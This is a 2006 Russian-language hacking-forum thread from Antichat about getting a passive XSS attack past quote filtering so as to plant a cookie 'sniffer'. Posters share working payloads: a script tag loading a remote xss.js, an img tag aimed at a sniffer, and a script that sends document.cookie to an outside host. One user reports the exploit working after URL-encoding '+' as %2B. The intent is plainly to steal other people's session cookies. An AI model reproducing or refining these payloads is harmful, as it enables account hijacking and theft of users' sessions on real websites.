Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Как можно произвести xss, если фильтруются кавычки? |
20.04.2006, 05:00
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Как можно произвести xss, если фильтруются кавычки?
Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.
Последний раз редактировалось 1ten0.0net1; 20.04.2006 в 06:42..
|
|
|
20.04.2006, 10:42
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609
Репутация:
239
|
|
Одинарный ковычки тоже фильтруютя?
__________________
Никому нельзя верить...
|
|
|
|
20.04.2006, 11:01
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
|
|
|
|
20.04.2006, 11:14
|
|
Новичок
Регистрация: 29.07.2005
Сообщений: 20
Провел на форуме:
357093
Репутация:
13
|
|
Ковычки могут понадобиться для того чтоб закрыть тег =)
Автор поясни какого типа XSS актив пасив мыло форум и т.д
|
|
|
|
20.04.2006, 15:18
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Сообщение от Azazel
Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>
Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.
|
|
|
|
21.04.2006, 01:46
|
|
Banned
Регистрация: 10.07.2005
Сообщений: 224
Провел на форуме:
1062041
Репутация:
50
|
|
а просто тыги можешь использовать?...
ну например картинку вставить?...
Код HTML:
<img src="тут твой код или адрес снифера">
а далее можешь проверить:
Код HTML:
<script>alert(document.images[0].src)</script>
Как дальше использовать думаю разберешься... |
|
|
|
21.04.2006, 23:35
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :-)
Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...
|
|
|
|
21.04.2006, 23:46
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src% 20=%20document.images[19].src+document.cookie;</script>
К примеру не подходит
|
|
|
|
21.04.2006, 23:49
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401
Репутация:
2
|
|
А, все, доперло - "+" = " "... как от этого избавиться? :-) & нельзя использовать, сразу говорю.
В виде "%ХХ" как "+" выглядит?
UPD: усе, спасибо, нашел :-) %2B - все работает
Последний раз редактировалось Laggi; 21.04.2006 в 23:52..
|
|
|
|
24.05.2006, 13:23
|
|
Новичок
Регистрация: 24.01.2005
Сообщений: 6
Провел на форуме:
10023
Репутация:
0
|
|
так как запрос без кавычек выглядит?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K[o]S](/avatars/avatar18223.gif){kind=avatar}
Похожие темы
Линейный вид
